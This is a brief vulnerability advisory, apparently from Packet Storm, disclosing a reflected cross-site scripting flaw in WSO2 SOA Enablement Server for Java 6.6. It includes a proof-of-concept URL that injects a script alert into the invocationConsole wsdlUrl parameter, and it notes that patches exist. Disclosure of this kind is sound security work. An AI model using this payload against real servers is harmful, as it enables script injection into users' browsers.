WSO2 SOA Enablement Server for Java/6.6 build SSJ-6.6-20090827-1616 suffers from a reflective cross site scripting vulnerability.
fa89320b02ace12f9ce8f44cd234672b01d01cdb40063e5160e5018276a2cba0Title: WSO2 SOA Enablement Server - Reflected Cross Site Scripting
Authors: Pawel Gocyla
Date: 08. June 2016
Affected Software:
==================
WSO2 SOA Enablement Server for Java/6.6 build SSJ-6.6-20090827-1616
Probably other versions are also vulnerable.
Vulnerability:
**************
Reflected Cross Site Scripting:
==============================
Proof of Concept:
https://WSO2SOA_IP:6443/invocationConsole?p.wsdlUrl=
<script>alert("XSS");</script>
Fix:
====
Patches were already released by the vendor.
Contact:
========
pawellgocyla[at]gmail[dot]com
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed